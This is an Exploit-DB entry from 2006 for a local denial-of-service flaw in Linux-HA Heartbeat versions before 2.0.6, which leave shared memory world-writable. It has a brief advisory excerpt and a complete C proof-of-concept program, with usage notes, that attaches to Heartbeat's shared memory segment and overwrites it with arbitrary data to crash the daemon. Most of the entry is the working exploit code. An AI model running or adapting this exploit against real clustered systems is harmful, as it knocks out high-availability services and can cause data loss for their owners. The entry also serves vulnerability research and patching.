Linux-HA Heartbeat 1.2.3/2.0.x - Insecure Default Permissions on Shared Memory

EDB-ID:

28287


Author:

anonymous

Type:

local


Platform:

Linux

Date:

2006-07-27


// source: https://www.securityfocus.com/bid/19186/info

Since Linux-HA Heartbeat has insecure default permissions set on shared memory, local attackers may be able to cause a denial of service.

Exploitation would most likely result in a system crash, loss of data, and resource exhaustion, leading to a denial of service if critical files are accessed improperly or overwritten in the attack. Other attacks may be possible as well.

/* Intruders Tiger Team Security
 * http://www.intruders.org.br/
 *
 * Heartbeat < 2.0.6 Insecure Shared Memory - Local Denial of Service.
 * 
 * Credits: Yan Rong Ge, see link below:
 * http://secunia.com/advisories/21162/
 * Tested on Heartbeat 2.0.5.
 *
 * Thanks for Wendel Guglielmetti, Waldemar Nehgme,
 * Joao Arquimedes, Ricardo BSD and Vitor, Intruders 
 * Tiger Team Security.
 *
 * Usage:
 * [security@mail1 tmp]$ ipcs
 * 
 * ------ Shared Memory Segments --------
 * key        shmid      owner      perms      bytes      nattch     status
 * 0x00000000 1638402    root      666        7296       6          dest
 *
 * ------ Semaphore Arrays --------
 * ....
 * Get shmid of heartbeat(look perms == 666, this is wrong!!!:))
 *
 *  [security@mail1 tmp]$ ./itts_sharedex2 1638402 "Intruders Tiger Team Security.."
 *
 * The heartbeat�s process will droped.
 * Brazil, July/2006.
 */


#include <stdio.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/shm.h>


int main(int argc, char *argv[]){
int shmid;
char *shm;

if(argc < 2){
printf("Heartbeat Insecure Shared Memory Exploit by Nash Leon\n");
printf("Usage: %s <target_shmid> <trash>\n", argv[0]);
exit(0);
}
shmid = atoi(argv[1]);
if ((shm = shmat(shmid, NULL, 0)) == (char *) -1) {
perror("shmat");
exit(1);
}

strncpy(shm,argv[2],1024);
printf("Check now heartbeat pid or shared memory\n");
printf("Running ps auxww | grep heartbeat or ipcs again.\n\n");
exit(0);
}